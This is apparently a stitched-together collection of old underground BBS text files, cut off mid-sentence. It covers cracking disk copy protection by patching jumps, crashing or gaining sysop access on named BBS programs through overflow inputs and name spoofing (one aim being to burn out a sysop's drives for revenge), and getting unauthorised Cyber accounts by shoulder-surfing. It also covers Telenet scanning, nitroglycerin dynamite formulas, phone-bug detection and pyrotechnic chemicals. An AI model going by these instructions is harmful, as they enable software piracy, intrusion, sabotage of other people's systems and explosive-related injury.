INT-13, the hard part for the most part is over. All that is left to do is to fool the computer in to thinking the protection has been found. To find out what the computer is looking for, examine the code right after the INT-13. Look for any branches having to do with the CARRY FLAG or any CMP to the AH register. If a JNE or JC (etc) occurs, then [U]nassembe the address listed with the jump. If it is a CMP then just read on. Here you must decide if the program was looking for a protected track or just a normal track. If it has a CMP AH,0 and it has read in a protected track, it can be assumed that it was looking to see if the program had successfully complete the READ/FORMAT of that track and that the disk had been copied thus JMPing back to DOS (usually). If this is the case, Just NOP the bytes for the CMP and the corresponding JMP. If the program just checked for the carry flag to be set, and it isn't, then the program usually assumes that the disk has been copied. Examine the following code INT 13 <-- Read in the Sector JC 1B00 <-- Protection found INT 19 <-- Reboot 1B00 (rest of program) The program carries out the INT and find an error (the illegaly formatted sector) so the carry flag is set. The computer, at the next instruction, see that the carry flag is set and know that the protection has not been breached. In this case, to fool the computer, just change the "JC 1B00" to a "JMP 1B00" thus defeating the protection scheme. NOTE: the PROTECTION ROUTINE might be found in more than just 1 part of the program Handling EXE files ------------------ As we all know, Debug can read .EXE files but cannot write them. To get around this, load and go about cracking the program as usual. When the protection scheme has been found and tested, record (use the debug [D]ump command) to save + & - 10 bytes of the code around the INT 13. Exit back to dos and rename the file to a .ZAP (any extension but .EXE will do) and reloading with debug. Search the program for the 20+ bytes surrounding the code and record the address found. Then just load this section and edit it like normal. Save the file and exit back to dos. Rename it back to the .EXE file and it should be cracked. ***NOTE: Sometimes you have to fuck around for a while to make it work. DISK I/O (INT-13) ----------------- This interrupt uses the AH resister to select the function to be used. Here 73 is a chart describing the interrupt. AH=0 Reset Disk AH=1 Read the Status of the Disk system in to AL AL Error ---------------------------- 00 - Successful 01 - Bad command given to INT *02 - Address mark not found 03 - write attempted on write prot *04 - request sector not found 08 - DMA overrun 09 - attempt to cross DMA boundary *10 - bad CRC on disk read 20 - controller has failed 40 - seek operation failed 80 - attachment failed (* denotes most used in copy protection) AH=2 Read Sectors input DL = Drive number (0-3) DH = Head number (0or1) CH = Track number CL = Sector number AL = # of sectors to read ES:BX = load address output AH =error number (see above) [Carry Flag Set] AL = # of sectors read AH=3 Write (params. as above) AH=4 Verify (params. as above -ES:BX) AH=5 Format (params. as above -CL,AL ES:BX points to format Table) For more information on INT-13 see the IBM Technical Reference Manuals. Coming Soon ------------ In part II, I will cover CALLs to INT-13 and INT-13 that is located in different overlays of the program *************************************************************************** * * * Cracking On the IBMpc * * Part II * * * *************************************************************************** 73  Introduction ------------ Ok guys, you now passed out of Kopy Klass 101 (dos files) and have this great new game with overlays. How the phuck do I crack this bitch. You scanned the entire .EXE file for the CD 13 and it's nowhere. Where can it be you ask yourself. In part II, I'll cover cracking Overlays and the use of locksmith in cracking. If you haven't read part I, then I suggest you do so. The 2 files go together. Looking for Overlays -------------------- So, you cant find CD 13 in the .EXE file, well, it can mean 4 things. 1, the .EXE (though it is mostly .COM) file is just a loader for the main file. 2, the .EXE file loads in an overlay. 3, the CD 13 is encrypted &/or hidden in the .EXE file. 4, your looking at the WRONG PHUCKEN PHILE. I won't discuss case 1 (or at least no here) because so many UNP files are devoted to PROLOCK and SOFTGUARD, if you can't figure it out with them, your PHUCKEN stupid. If you have case 3, use the technique in part I and restart from the beg. And if you have case 4, shoot your self. You know the program uses overlays but don't see and on disk? Try looking at the disk with good old nortons. Any hidden files are probably the overlays. These are the ones we are after. If you still can't find them, use PC-WATCH (this program is a must!!! for all crackists. Traps ALL interrupts). Using PC-Watch to Find Overlays ------------------------------- Start up PC-Watch and EXCLUDE everything in the left col. Search the right col. until you find DOS21 - OpnFile and select it. Now run the program to be cracked. Play the game until the protection is checked. Examine you pcwatch output to see what file was loaded right before it. This probably is the one holding the check. If not, shit go through all the files. You Have Found the Overlays --------------------------- Great, now just crack the overlay as if it was a DOS file. You don't need to worry about .EXE file, debug can write an overlay file. Part I explains the basics of cracking. I suggest that you keep a backup copy of the overlay so if you phuck up, and you will, you can recover quickly. Ah, and you thought cracking with overlays was going to be hard. Locksmith and Cracking ---------------------- The copy/disk utility program Locksmith by AlphaLogic is a great tool in cracking. It's analyzing ability is great for determining what and where the protection is. I find it useful, before I even start cracking, to analyze the protected disk to find and id it's protection. This helps in 2 ways. First, it helps you to know what to do in order to fake out the protection. Second, it helps you to find what the program is looking for. 73  I suggest that you get locksmith if you don't already have it. Check your local pirate board for the program. I also suggest getting PC-Watch and Norton Utilities 3.1. All of these program have many uses in the cracking world. How To Crash a Commadore BBS Part One - How to crash a RAVICS BBS Try to chat with the sysop. If it starts to say "Attemp #1" and so on, then just hit 'C' >VERY< fast a few hundred times. After it pages the sysop about 30 times it will give an out of memory error in such and such a line. Part Two - How to crash an IIBBS This will only work if the sysop is running either an un-modified version of IIBBS, or he has the very first version. Log on as a new user. Log off and then log on again as a new user. Then log off and try to log on again as the SECOND new user you logged in as. In the old version, the BBS dosn't initialize the drive after writing to the relative file. Therefore, when you try to log in as the second new user, it will try to read past the bad position but will never find it. This will leave his drive spinning until he can come in and reset the system. If it dosn't work the first time try again with two more new users, and so on. The system will just sit there sending a carrier to you. When the drive is left spinning it will heat up the metal frame in inside of the 1541 drive. This will cause the readwwrite head to be knocked out of alignment, costing the sysop a mere $45... Part 3 - How to crash a 64 Exchange Go into the download section and start to download a file. When it is ready to send (it should say 'A to abort, B to change block size. Ready to send') then select B and enter '99e99' when it asks for the new block size (99e99 is a number bigger than the computer can accept). This will only work on older versions of 64 Exchange. Part One - Another Way to Crash IIBBS Log on and enter the message base. At the prompt enter '99e99'. This will cause an overflow error. If the sysop has a crash handling routine, then use the method in How to Crash C64 BBS's - I and fry his drive. Here is another way. If you log in and it says 'You have mail' or whatever, but it dosn't list who it's from and the date, then go into the e-mail section. Proceed to read your mail. It should say 'No mail found' or whatever. At the prompt, enter 'R' for reply or 'D' for delete. It will delete your mail and cause an Illegal quantity error. Part Two - How to Crash a RAVICS V9.3 Log on as a new user. When it say it's creating your ID hit a bunch of keys. This will lock up the program and leave his drive spinning. Part Three - How to Crash Hal BBS 4.6 73  Enter 255 for your ID # and 'HAL' for the password. If the sysop has the BASIC version this won't work. But if it does you will now be in the sysop menu. Have fun... Part Four - How to Crash Ace Line 3.5 Log on and check to see if they are running the version modified by General Zod (it should have his name all over it). If it is just call back about 10 times. Sooner or later it will cause an Out of Memory error. How to crash GBBS ][ boards We all have that one local board around you that you would really like to crash! Maybe the sysop did something really bad to you or something in that nature! Boy he sure would get Mad when he wakes up with both drives burned out, user file is messed up or something like that! One thing to remember is when you call the board to crash it, I'd use a phoney allias name (even another person you want to get revenge on too!) because they will really get mad about crashing thier board and will really kick some ass when they find out who did it. Just a warning! 1> Lets say the sysops name to the GBBS board is "Butch Jr.". Call the place up and when it asks for your last name, type "Jr.". When it asks for your password, type in what ever you have to type for a new user. Then it should ask for your first name. Just type " Butch" (1 space infront of name). This will automaticly put you into sysop command level and you will be able to delete messages, users, exit the GBBS program and initalize the disks and ect.....Just about anything your little heart wants to do! Modify the board and delete the sysop too! This way for crashing also works when you type in for last name:" Jr." and first name "Butch". It should do the same thing. The one major drawback to this way of crashing is that most GBBS boards have thier oards modified to that you can't do this. They will have it either hang up after you type it in, Display a nasty message for you, or just ask for the last name again. Oh well! No body is perfect! 2> Call the board up and log on as a new user. When it asks for the city/state you live in, type in a few commas like this: "Tampa,,,,,,,,,,Fla" or ",,,,,,,,,,,,,,,,,,," will do! You just have to have more than 2 or 3 commas to do the job right. This way should kill the passwords on the user file! When you leave a message up on the board, save it, and then it says "Wait" for about 10 seconds. Vry this one: Leave a message on the board and save it and when it says "Wait", Just do a little "esc-h" (to hang up in Ascii Express). That way should be writting the message and when it looses the carrier, it will be off the hook for the night! You can hang up on either "Wait" (after saving message an` after you abort into the main command board. 4> When the GBBS asks for a number like board number or something like that, type in "99E99". This creats and error on the board and might put 73 you in sysop command level depending on what serial number the GBBS program is. It will do some other things too. 5> When you log on and it asks for your password, type in a negative number like "G-99FFF" or "A-01AAA" or some negative number kinda like that. This should also create an error and might even put you in sysop command level (you can do anything from there! Believe me!) But like I said before, Depending on what type of serial number the program is. 6> Log on as a new user and when it's reading the new user welcome or just any text file, type "Cntl-s Cntl-p :" and that should make a fatal error on his part and put you proptly into basic or machine language with dos loaded and you can work from there! 7> New user reading welcome message and type "Cntl-s Cntl-p *" and that will bomb the board out also. 8> New user reading welcome message and type "Cntl-s Cntl-p" and start pounding on the keyboard! That sould fill the buffer up and make a fatal error and put you into machine language or basic. Work from there! 9> New user reading welcome message and type "Cntl-s" and hold repeat and "Cntl-p" down and that will also bomb the buffer too and put you into machine or basic language. Hacking Control Data Corporation's Cyber This article will cover getting into and using NOS (Networking Operating System) version 2.5.2 running on a Cyber 730 computer. Cybers generally run this operating system so I will just refer to this environment as Cyber. Also, Cyber is a slow and outdated operating system that is primarily used only for college campuses for running compilers. First off after you have scanned a bunch of carriers you will need to know how Cyber identifies itself. It goes like this: WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978, 1987. 88/02/16. 02.36.53. N265100 CSUS CYBER 170-730. NOS 2.5.2-678/3. FAMILY: You would normally just hit return at the family prompt. Next prompt is: USER NAME: User names are in the format abcdxxx where a is the location of where the account is being used from (A-Z). the b is a grouping specifying privileges and limits for the account- usually A-G -where A is the lowest access. Some examples of how they would be used in a college system: A = lowest access - class accounts for students B = slightly higher than A (for students working on large projects) C = Much higher limits, these accounts are usually not too hard to get 73  and they will normally last a long time! Lab assistants use these. D = Instructors, Lecturers, Professors.. etc.. E = same... (very hard to get these!) The C and D positions are usually constant according to the groupings. For example, a class would have accounts ranging from NADRAAA-AZZ ^^^ ^^^ These can also be digits There are also special operator accounts which start with digits instead of numbers. (ie 7ETPDOC) These accounts can run programs such as the monitor which can observe any tty connected to the system... The next prompt will be for the password, student account passwords cannot be changed and are 7 random letters by default, other account passwords can be changed. You get 3 tries until you are logged out. It is very difficult if not impossible to use a brute force hacker or try to guess someones account.. so how do you get on? Here's one easy way... Go down to your local college (make sure they have a cyber computer!) then just buy a class catalog (they only cost around 50 cents) or you could look, borrow, steal someone else's... then find a pascal or fortran class that fits your schedule! You will only have to attend the class 3 or 4 times max. Once you get there you should have no trouble, but if the instructor asks you questions about why you are not on the roll, just tell him that you are auditing the class (taking it without enrolling so it won't affect your GPA). The instructor will usually pass out accounts on the 3rd or 4th day of class.. this method also works well with just about any system they have on campus! Another way to get accounts is to go down to the computer lab and start snooping! Look over someones shoulder while they type in their password, or look thru someones papers while they're in the bathroom, or look thru the assistants desk while he is helping someone... (I have acquired accounts both ways, and the first way is a lot easier with less hassles) Also, you can use commas instead of returns when entering user name and password. Example: at the family prompt, you could type ,nadrajf,dsfgkcd or at the user name prompt nadrajf,dsfgkcd After you enter your info, the system will respond with: JSN: APXV, NAMIAF / The 'APXV, NAMIAF' could be different depending on what job you were attached to. The help program looks a lot neat if you have vt100 emulation, if you do, type [screen,vt100] (don't type the brackets! from now on, all commands I refer to will be enclosed in brackets) Then type help for an extensive tutorial or a list of commands. Your best bet at this point is to buy a quick reference guide at the campus because I am only going to describe the most useful commands. The / means you are in the batch subsystem, there are usually 6 or 7 other subsystems like basic, fortran, etc... return to batch mode by typing [batch]. Some useful commands:  73  CATLIST - will show permanent files in your directory. ENQUIRE,F - displays temporary files in your workspace. LIMITS - displays your privileges. INFO - get more online help. R - re-execute last command. GET,fn - loads fn into the local file area. CHANGE - certain specs on a file. PERMIT - allow other users to use one of your files. REWIND,* - rewinds all your local files. NEW,fn - creates new file. PURGE - deletes files. LIST,F=fn - list file. UPROC - create an auto-execute procedure file. MAIL - send/receive private mail. BYE - logoff. Use the [helpme,cmd] command for the exact syntax and parameters of these commands. There are also several machine specific 'application' programs such as pascal, fortran, spitbol, millions of others that you can look up with the INFO command... there are also the text editors; edit, xedit, and fse (full screen editor). Xedit is the easiest to use if you are not at a Telray 1061 terminal and it has full documentation. Simply type [xedit,fn] to edit the file 'fn'. Special control characters used with Cyber: Control S and Control Q work normally, the terminate character is Control T followed by a carriage return. If you wanted to break out of an auto-execute login program, you would have to hit ^T C/R very fast and repetitively in order to break into the batch subsystem. Control Z is used to set environment variables and execute special low level commands, example: [^Z TM C/R] this will terminate your connection... So now you're thinking, what the hell is Cyber good for? Well, they won't have any phone company records, and you can't get credit information from one, and I am not going to tell you how to crash it since crashing systems is a sin. There are uses for a cyber though, one handy use is to set up a chat system, as there are normally 30-40 lines going into a large university cyber system. I have the source for a chat program called the communicator that I will be releasing soon. Another use is some kind of underground information exchange that people frequently set up on other systems, this can easily be done with Cyber. Procedure files: A procedure file is similiar to a batch file for MS-DOS, and a shell script for UNIX. You can make a procedure file auto-execute by using the UPROC command like [uproc,auto] will make the file 'auto', auto execute. There is also a special procedure file called the procfile in which any procedure may be accessed by simply a - in front of it. If your procfile read: .proc,cn. .* sample procedure $catlist/un=7etpdoc. $exit.  73  Then you could simply type -cn and the / prompt and it would execute the catlist command. Now back to uprocs, you could easily write a whole BBS in a procedure file or say you wanted to run a chat system and you did not want people to change the password on your account, you could do this: .proc,chat, PW"Password: "=(*A). $ife,PW="cyber",yes. $chat. $revert. $bye. $else,yes. $note./Wrong password, try again/. $revert. $bye. $endif,yes. This procedure will ask the user for a password and if he doesn't type "cyber" he will be logged off. If he does get it right then he will be dumped into the chat program and as soon as he exits the chat program, he will be logged off. This way, the user cannot get into the batch subsystem and change your password or otherwise screw around with the account. The following is a listing of the procfil that I use on my local system, it has a lot of handy utilities and examples... .PROC,B. .******BYE****** $DAYFILE. $NOTE.////////////////////////// $ASCII. $BYE. $REVERT,NOLIST. #EOR .PROC,TIME. .******GIVES DAY AND TIME****** $NOTE./THE CURRENT DAY AND TIME IS/ $FIND,CLOCK./ $REVERT,NOLIST. #EOR .PROC,SIGN*I,IN. .******SIGN PRINT UTILITY******. $GET,IN. $FIND,SIGN,#I=IN,#L=OUT. $NOTE./TO PRINT, TYPE: PRINT,OUT,CC,RPS=??/ $REVERT,NOLIST. #EOR .PROC,TA. .******TALK****** $SACFIND,AID,COMM. $REVERT,NOLIST. #EOR .PROC,DIR,UN=,FILE=. .******DIRECTORY LISTING OF PERMANENT FILES****** $GET(ZZZZDIR=CAT/#UN=1GTL0CL) ZZZZDIR(FILE,#UN=UN) $RETURN(ZZZZDIR) $REVERT,NOLIST. #EOR .PROC,Z19. .******SET SCREEN TO Z19****** $SCREEN,Z19. $NOTE./SCREEN,Z19. $REVERT,NOLIST. #EOR .PROC,VT. .******SET SCREEN TO VT100****** $SCREEN,VT100. $NOTE./SCREEN,VT100. 73 $REVERT,NOLIST #EOR .PROC,SC. .******SET SCREEN TO T10****** $SCREEN,T10. $NOTE./SCREEN,T10. $REVERT,NOLIST #EOR .PROC,C. .******CATLIST****** $CATLIST. $REVERT,NOLIST. #EOR .PROC,CA. .******CATLIST,LO=F****** $CATLIST,LO=F. $REVERT,NOLIST. #EOR .PROC,MT. .******BBS****** $SACFIND,AID,MTAB. $REVERT,NOLIST. #EOR .PROC,LI,FILE=. .******LIST FILE****** $GET,FILE. $ASCII. $COPY(FILE) $REVERT. $EXIT. $CSET(NORMAL) $REVERT,NOLIST. WHERE IS THAT FILE?? #EOR .PROC,LOCAL. .******DIRECTORY OF LOCAL FILES****** $RETURN(PROCLIB,YYYYBAD,YYYYPRC) $GET(QQQFILE=ENQF/UN=1GTL0CL) QQQFILE. $REVERT,NOLIST. $EXIT. $REVERT. FILES ERROR #EOR .PROC,RL. .******RAISE LIMITS****** $SETASL(*) $SETJSL(*) $SETTL(*) $CSET(ASCII) $NOTE./ Limits now at max validated levels. $CSET(NORMAL) $REVERT,NOLIST. #EOR .PROC,CL. .******CLEAR****** $CLEAR,*. $CSET(ASCII) $NOTE./LOCAL FILE AREA CLEARED $REVERT,NOLIST. #EOR .PROC,P,FILE=THING,LST=LIST. .*********************************************************** $CLEAR. $GET(FILE) $PASCAL4,FILE,LST. $REVERT. $EXIT. $REWIND,*. $CSET(ASCII) $COPY(LIST) $CSET(NORMAL) $REVERT,NOLIST. #EOR .PROC,RE. .******REWIND****** $REWIND,*. 73 $CSET(ASCII) $NOTE./REWOUND. $REVERT,NOLIST. #EOR .PROC,FOR,FILE,LST=LIST. .******************************************************************** $CLEAR. $GET(FILE) $FTN5,I=FILE,L=LST. $REPLACE(LST=L) $CSET(ASCII) $REVERT. Fortran Compiled $EXIT. $REWIND,*. $COPY(LST) $REVERT. That's all folks. #EOR .PROC,WAR. .******WARBLES****** $SACFIND,AID,WAR. $REVERT,NOLIST. #EOR .PROC,M. .******MAIL/CHECK****** $MAIL/CHECK. $REVERT,NOLIST. #EOR .PROC,MA. .******ENTER MAIL****** $MAIL. $REVERT,NOLIST. #EOR .PROC,HE,FILE=SUMPROC,UN=. .******HELP FILE****** $GET,FILE/#UN=UN. $COPY(FILE) $REVERT. $EXIT. $REVERT,NOLIST. #EOR .PROC,DYNAMO. .******WHO KNOWS??****** $GET,DYNMEXP/UN=7ETPDOC. $SKIPR,DYNMEXP. $COPYBR,DYNMEXP,GO. $FIND,DYNAMO,GO. $REVERT,NOLIST. #EOR #EOR #EOI The Basics of TELENET Part I This Bulletin is the first in a series to cover the general procedures of the major data networks: Telenet Tymnet Autonet Arpanet [More to be added] BACKGROUND 73  ---------- Telenet connects many large computers to itself through dedicated telephone lines, each of these 'host computers' is assigned a node address(ie.:NPAxx). Telenet is an international data network, connecting to computers around the world.See the International telenet bulletin for more on this. CONNECTING ---------- Telenet is probably the most 'user friendly' network of the four listed. A normal logon looks like this: [NPA=Area code,xx=node address] You hit [2 Returns] Telenet respnds with:TELENET NPAxx TERMINAL=(Here you type your terminal identifier) (See the bulletin section for the list) @ The '@' is Telenet's promt to you to go ahead. Things to do on telenet ----------------------- To connect to a node type: @C NPAxx Telenet will atempt to connect to the computer at the node given. A few of the things that Telenet will say are: NPAxx CONNECTED (You are connected to a computer) ILLEGAL ADDRESS (Not a working node) NPAxx NOT REACHABLE (The computer at that node is 'DOWN') NPAxx REFUSED COLLECT CONNECTION(Needs a paid ID [More later] NPAxx REJECTING (Computer is 'UP' but not available) NPAxx NOT RESPONDING (The computer at that node is 'DOWN') These are most of the things that Telenet will tell you MORE THINGS TO DO ----------------- Typing an @ while in a host computer will return you to Telenet You will still be connected to the other computer, you may: D (to disconnect from that computer) or TAPE (Unknown, possibly records your actions so that) (you may look at them later) If you type either of the above, while not connected to a node telenet will respond with NOT CONNECTED MISC. ----- RESET (Returns Telenet to the beggining,you must start again (with the ) SET (Unknown) MAIL (To connect to GTE Telemail) It will ask for User? and Password?  73  NOTES ----- In addition to the normal area codes in NPAxx there are also other NPA's used in Telenet, 909 and 311, for instance. Telenet hangs up after three disconnections from host computers, this unfortunately is quite a PAIN in the ___ There is no way to get around this as far as I can tell. The ID command in Telenet is to Identify users to the host computers. You must type ID (your ID#) (your password). If you just type ID, telenet will tell you that your ID is cleared, which means nothing. To recieve a paid user ID on telenet call them at: Telenet customer service:800-336-0437 800-572- 0408(In Virginia) HACKING ------- Telenet is very convinient for hackers as it connects many computers to your terminal, without having to find and dial many numbers. Start your Telehacking by picking an areacode and then trying all the nodes in that NPA. You will no doubt find many interesting computers 'to work on'. Here are instructions for using TELENET. There are some very basic things, which most people already know, and some other things, which even the most dedicated hackers have probably never even heard of. This includes things such as international access, etc. Well, have fun. THE TELENET CONNECTION INTERNATIONAL ADDRESSING/INTERNATIONAL ACCESS PROCEDURES I. TELENET INTERNATIONAL ADDRESS FORMAT ---------------------------- Data Network | Identification Code (DNIC) | | | | ------------------- Area Code | | | | | | ------------- DTE Address | | | | | | ----- Port Address | | | | | | | | DDDD AAA HHHHH PP | ----- Optional Subaddress Field for Packet Mode DTE  73  Example: Telenet International ------- ------------- 212 141 3110 21200141 909 84 3110 90900084 II. ACCESS TO OVERSEAS PUBLIC DATA NETWORKS 1. Turn on the terminal and coupler. 2. Dial the nearest Telenet access number (See Telenet Public Dial listing). When you hear a high-pitched tone, place the telephone receiver in the coupler. For Data Sets (Bell 103 or 113 type), depress the data button. 3. Type Two carriage returns (CR). 4. Telenet will give you a port identification number and ask you to identify your terminal type in the two or four character id for your terminal followed by a carriage return (CR) or type carriage return (CR). (EX.) TELENET 202 DL9 TERMINAL = AJ63(CR) 5. After Telenet prompts with a '@' type 'ID', skip a space (SP) and type your password followed by a carriage return. (Contact your GTE Telenet Representative to obtain a required caller paid ID.) (EX.) @ID(SP);INTL(CR) Type in your password. (EX.) PASSWORD = 123456(CR) 6. After Telenet prompts with an @, type a C. skip a space and type the network address of the computer you wish to access, followed by a carriage return (CR). (EX.) @C(SP)023411234567890(CR) Note: Your International address will follow a format such as: 020801234567890 for France/Transpac 023421234567890 for United Kingdom/British Telecom 026241234567890 for Germany/Datex-P 7. Telenet will respond with a connection message. You are now ready to begin your conversation with the host computer. (EX.) (ADDRESS)CONNECTED  73 8. To disconnect from your computer, log off as usual. Telenet will send you a disconnected message. (EX.) (ADDRESS)DISCONNECTED Hang up to disconnect from Telenet. (CR) = Carriage return (SP) = Space Dynamite Dynamite is nothing more than just nitroglycerin and a stablizing agent to make it much safer to use. For the sake of saving time, I will abbreviate nitroglycerin with a plain NG. The numbers are percentages, be sure to mix these carefully and be sure to use the exact amounts. These percentages are in weight ratio, not volume. no. ingredients amount --------------------------------------- #1 NG 32 sodium nitrate 28 woodmeal 10 ammonium oxalate 29 guncotten 1 #2 NG 24 potassium nitrate 9 sodium nitate 56 woodmeal 9 ammonium oxalate 2 #3 NG 35.5 potassium nitrate 44.5 woodmeal 6 guncotton 2.5 vaseline 5.5 powdered charcoal 6 #4 NG 25 potassium nitrate 26 woodmeal 34 barium nitrate 5 starch 10 #5 NG 57 potassium nitrate 19 woodmeal 9 ammonium oxalate 12 guncotton 3 #6 NG 18 sodium nitrate 70 73  woodmeal 5.5 potassium chloride 4.5 chalk 2 #7 NG 26 woodmeal 40 barium nitrate 32 sodium carbonate 2 #8 NG 44 woodmeal 12 anhydrous sodium sulfate 44 #9 NG 24 potassium nitrate 32.5 woodmeal 33.5 ammonium oxalate 10 #10 NG 26 potassium nitrate 33 woodmeal 41 #11 NG 15 sodium nitrate 62.9 woodmeal 21.2 sodium carbonate .9 #12 NG 35 sodium nitrate 27 woodmeal 10 ammonium oxalate 1 #13 NG 32 potassium nitrate 27 woodmeal 10 ammonium oxalate 30 guncotton 1 #14 NG 33 woodmeal 10.3 ammonium oxalate 29 guncotton .7 potassium perchloride 27 #15 NG 40 sodium nitrate 45 woodmeal 15 #16 NG 47 starch 50 guncotton 3 #17 NG 30 sodium nitrate 22.3 woodmeal 40.5 73  potassium chloride 7.2 #18 NG 50 sodium nitrate 32.6 woodmeal 17 ammonium oxalate .4 #19 NG 23 potassium nitrate 27.5 woodmeal 37 ammonium oxalate 8 barium nitrate 4 calcium carbonate .5 BUG DETECTION ON HOME PHONES FIRST OF ALL TO TEST FOR BUGS, YOU NEED A VOM (MULTIMETER) THE HIGHER THE IMPEDANCE THE BETTER (A DIGITAL WITH FET CIRCUITRY OR A VACUUM TUBE VOLT METER IS THE BEST). FIRST DISCONNECT THE PHONE LINE(S) AT BOTH ENDS. UNDO THE PHONE INSTRUMENT AND HOOK IT UP TO THE ENTRY POINT OF THE PHONE LINE FROM THE OUTSIDE WORLD (MA BELL DOES NOT LIKE YOU CUT HER OFF COMPLETELY.) THE SCHEME IS THE PHYSICALLY ISOLATE YOUR HOUSE, APARTMENT, ETC. FROM THE OUTSIDE WORLD. BUT BEFORE YOU DO THIS MEASURE THE LINE VOLTAGE (IT SHOULD BE APPROXIMATELY 48 VOLTS). NOW WITH THE WIRES DISCONNECTED AT BOTH ENDS, SET YOUR RESISTANCE SCALE TO A HIGH READING AND MEASURE THE RESISTANCE OF THE PHONE LINE, IT SHOULD BE VERY HIGH ON THE ORDER OF MILLION OHMS OR MORE, THIS IS THE NORMAL CONDITION, SINCE YOU ARE MEASURING THE RESISTANCE OF AN OPEN CIRCUIT. IF IT IS MUCH LESS, SAY 50-100KOHMS THEN YOU A DEVICE ON THE LINE THAT DOES NOT BELONG THERE, PROBABLY A PARALLEL BUG. NOW TWIST THE END OF THE DISCONNECTED WIRE AND GO TO THE OTHER END AND MEASURE THE RESISTANCE OF THIS. THIS RESISTANCE SHOULD BE ABOUT ONE OHM OR TWO AT THE MOST IN A BIG HOUSE WITH A LOT OF PHONES. IF IT IS MORE, THEN YOU PROBABLY HAVE A SERIES BUG. IF IN THE FIRST CASE, TAKING PARALLEL MEASUREMENTS USING A METER (NOT LEDLLCD) AND YOU NOTICE A "KICK" IN THE NEEDLE, YOU PROBABLY HAVE A LINE TAP. NOW IF YOU ALSO MAKE A MEASUREMENT WITH THE WIRE END TWISTED TOGETHER AND YOU NOTICE THE RESISTANCE READS ABOUT 1-2KOHMS, THEN YOU MAY HAVE A DROP-OUT RELAY. A DROP-OUT RELAY IS A RELAY THAT SENSES A PHONE GOING OFF HOOK, AND SIGNALS A TAPE RECORDER TO START RECORDING. ANOTHER TEST TO DO WITH THE PHONES STILL HOOKED UP TO THE OUTSIDE WORLD, ON HOOK VOLTAGE IS ABOUT 48 VOLTS AND OFF HOOK IS ABOUT 6-10 VOLTS. ANY OTHER CONDITIONS MAY MEAN TELEPHONE SURVEILLANCE. IF YOU USE A WIDE RANGE AUDIO FREQUENCY GENERATOR AND CALL YOUR HOUSE, APARTMENT, ETC. FROM ANOTHER PHONE AND SWEEP UP AND DOWN THE SPECTRUM, AND YOU 73 NOTICE THE PHONE ANSWERS ITSELF SOMEWHERE IN THE SWEEP YOU PROBABLY HAVE AN INFINITY TRANSMITTER ON YOUR LINE. Stars, Flares, and Color Mixtures We will be using the following materials this time. Get familiar with them. Some can be highly dangerous. Aluminum Dust (and powder) Al An element used for brilliancy in the fine powder form. It can be purchased as a fine silvery or gray powder. All grades from technical to superpure (99.9%) can be used. It is dangerous to inhale the dust. The dust is also flammable, by itself. In coarser forms, like powder, it is less dangerous. Antimony Sulfide Sb S 2 3 Also known as "Black" Antimony Sulfide. (There is also a "Red" form, which is useless to us.) This is used to sharpen the report of firecrackers, salutes, etc, or to add color to a fire. The technical, black, powder is suitable. Avoid contact with the skin. Dermatitis or worse will be the result. Barium Chlorate Ba(ClO ) * H O 3 2 2 Available as a white powder. It is poisonous, as are all Barium salts. It is used both as an oxidizer and color imparter. It is as powerful as Potassium Chlorate and should be handled with the same care. Melting point is 414 degrees. Barium Nitrate Ba(NO ) 3 2 Poisonous. Used as an oxidizer and colorizer. The uses and precautions are the same as with a mixture containing Potassium Nitrate. Charcoal C A form of the element carbon. Used in fireworks and explosives as a reducing agent. It can be purchased as a dust on up to a coarse powder. Use dust form, unless otherwise specified. The softwood variety is best, and it should be black, not brown. Copper Acetoarsenite (CuO) As O Cu(C H O ) 3 2 3 2 3 2 2 The popular name for this is Paris Green. It is also called King's Green or Vienna Green. It has been used as an insecticide, and is available as a technical grade, poisonous, emerald green powder. It is used in fireworks to add color. Careful with this stuff. It contains arsenic. Copper Chloride CuCl 2 A color imparter. As with all copper salts, this is poisonous. 73  Copper Sulfate CuSO *5H O 4 2 Known as Blue Vitriol, this poisonous compound is available as blue crystals or blue powder. Can be purchased in some drugstores and some agricultural supply stores. Used as a colorizer. Dextrine This can be purchased as a white or yellow powder. It is a good cheap glue for binding cases and stars in fireworks. Lampblack C This is another form of the element carbon. It is a very finely powdered black dust (soot, actually) resulting from the burning of crude oils. It is used for special effects in fireworks. Lead Chloride PbCl 3 Available as a white, crystalline, poisonous powder, which melts at 501 degrees. As with all lead salts, it is not only poisonous, but the poison accumulates in the body, so a lot of small, otherwise harmless doses can be as bad as one large dose. Mercurous Chloride HgCl Also known as calomel or Mercury Monochloride. This powder will brighten an otherwise dull colored mixture. Sometimes it is replaced by Hexachlorobenzene for the same purpose. This is non poisonous ONLY if it is 100% pure. Never confuse this chemical with Mercuric Chloride, which is poisonous in any purity. Potassium Chlorate KClO 3 This, perhaps, is the most widely used chemical in fireworks. Before it was known, mixtures were never spectacular in performance. It opened the door to what fireworks are today. It is a poisonous, white powder that is used as an oxidizer. Never ram or strike a mixture containing Potassium Chlorate. Do not store mixtures containing this chemical for any length of time, as they may explode spontaneously. Potassium Dichromate K Cr O 2 2 7 Also known as Potassium Bichromate. The commercial grade is used in fireworks and matches. The bright orange crystals are poisonous. Potassium Nitrate KNO 3 Commonly called Saltpeter. This chemical is an oxidizer which decomposes at 400 degrees. It is well known as a component of gunpowder and is also used in other firework pieces. Available as a white powder. Potassium Perchlorate KClO 4 Much more stable than its chlorate brother, this chemical is a white or slightly pink powder. It can often substitute for Potassium Chlorate to make 73 the mixture safer. It will not yield its oxygen as easily, but to make up for this, it gives off more oxygen. It is also poisonous. Red Gum Rosin similar to shellac and can often replace it in many fireworks formulas. Red Gum is obtained from barks of trees. Shellac Powder An organic rosin made from the secretions of insects which live in India. The exact effect it produces in fireworks is not obtainable from other gums. The common mixture of shellac and alcohol sold in hardware stores should be avoided. Purchase the powdered variety, which is orange in color. Sodium Oxalate Na C O 2 2 4 Used in making yellow fires. Available as a fine dust, which you should avoid breathing. Strontium Carbonate SrCO 3 Known in the natural state as Strontianite, this chemical is used for adding a red color to fires. It comes as a white powder, in a pure, technical, or natural state. Strontium Nitrate Sr(NO ) 3 2 By far the most common chemical used to produce red in flares, stars and fires. Available in the technical grade as a white powder. It does double duty as an oxidizer, but has a disadvantage in that it will absorb some water from the air. Strontium Sulfate SrSO 4 Since this chemical does not absorb water as readily as the nitrate, it is often used when the powder is to be stored. In its natural state it is known as Celestine, which is comparable to the technical grade used in fireworks. Sulfur S A yellow element that acts as a reducing agent. It burns at 250 degrees, giving off choking fumes. Purchase the yellow, finely powdered form only. Other forms are useless without a lot of extra and otherwise unnecessary effort to powder it. Zinc Dust Zn Of all 